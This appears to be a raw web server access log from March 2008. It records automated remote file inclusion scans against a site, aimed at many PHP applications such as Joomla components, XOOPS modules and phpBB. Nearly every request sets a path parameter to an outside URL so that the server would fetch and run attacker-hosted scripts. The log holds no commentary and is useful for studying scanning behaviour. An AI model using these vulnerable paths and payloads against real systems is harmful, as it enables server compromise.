122.201.81.6 - - [23/Mar/2008:05:07:52 -0700] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:08:06 -0700] "GET /logs/access_080306.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:08:06 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [23/Mar/2008:05:08:06 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:08:09 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:08:12 -0700] "GET /logs/access_080119.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:08:12 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:08:12 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:08:13 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:08:14 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:08:24 -0700] "GET /logs/access_080228.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:08:25 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:08:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:05:08:26 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:05:08:27 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:05:08:29 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:05:08:33 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.24.50.200 - - [23/Mar/2008:05:08:38 -0700] "GET /logs/access_080209.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:08:48 -0700] "GET /logs/access_080228.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:08:48 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:08:48 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:08:59 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:09:00 -0700] "GET /logs/access_080228.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:09:01 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.245.159.231 - - [23/Mar/2008:05:09:01 -0700] "GET /logs/access_080126.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:09:01 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.245.159.231 - - [23/Mar/2008:05:09:02 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.245.159.231 - - [23/Mar/2008:05:09:03 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.95 - - [23/Mar/2008:05:09:09 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.147.134.7 - - [23/Mar/2008:05:09:15 -0700] "GET /logs/access_080210.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:09:16 -0700] "GET /logs/access_080228.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:09:17 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:09:17 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:09:35 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:09:45 -0700] "GET /logs/access_080124.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:09:46 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:09:46 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:05:09:49 -0700] "GET /logs/access_080228.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:05:09:49 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:09:53 -0700] "GET /logs/access_080119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:05:09:54 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:10:03 -0700] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:10:03 -0700] "GET /logs/access_080213.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:05:10:14 -0700] "GET /logs/access_080228.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:05:10:17 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:05:10:18 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.142.172 - - [23/Mar/2008:05:10:25 -0700] "GET /logs/access_080126.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.142.172 - - [23/Mar/2008:05:10:25 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.142.172 - - [23/Mar/2008:05:10:26 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:05:10:48 -0700] "GET /logs/access_080209.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:05:10:49 -0700] "GET /logs/access_080209.log/skins/advanced/advanced1.php?pluginpath[0]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:11:09 -0700] "GET /logs/access_080313.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:11:10 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [23/Mar/2008:05:11:10 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.227 - - [23/Mar/2008:05:11:22 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
203.146.251.227 - - [23/Mar/2008:05:11:22 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
203.146.251.227 - - [23/Mar/2008:05:11:22 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
203.146.251.227 - - [23/Mar/2008:05:11:23 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:11:29 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:11:39 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:11:40 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:11:42 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:11:51 -0700] "GET /logs/access_080213.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:11:56 -0700] "GET /logs/access_080228.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:11:56 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:11:56 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:12:02 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:12:02 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:12:02 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.169.142.172 - - [23/Mar/2008:05:12:08 -0700] "GET /logs/access_080225.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:12:13 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:12:14 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:12:14 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:12:42 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:05:12:44 -0700] "GET /logs/access_080215.log/index1.php?inc=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:05:12:46 -0700] "GET /index1.php?inc=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:05:12:47 -0700] "GET /logs/index1.php?inc=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:12:47 -0700] "GET /logs/access_080213.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [23/Mar/2008:05:13:56 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.178 - - [23/Mar/2008:05:13:57 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.178 - - [23/Mar/2008:05:13:58 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.208.12 - - [23/Mar/2008:05:14:15 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:05:15:59 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:05:16:05 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:05:16:05 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:05:16:07 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:05:16:08 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:05:16:08 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:05:16:11 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:05:16:17 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:05:16:17 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:16:46 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:16:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:16:57 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.208.12 - - [23/Mar/2008:05:16:59 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:05:17:03 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.245.159.231 - - [23/Mar/2008:05:17:04 -0700] "GET /logs/access_080225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:17:30 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:17:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.49.37.139 - - [23/Mar/2008:05:17:34 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:05:18:30 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:05:18:32 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:05:18:35 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:05:18:35 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.179.215 - - [23/Mar/2008:05:19:40 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.179.215 - - [23/Mar/2008:05:19:40 -0700] "GET //include.php?path[docroot]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
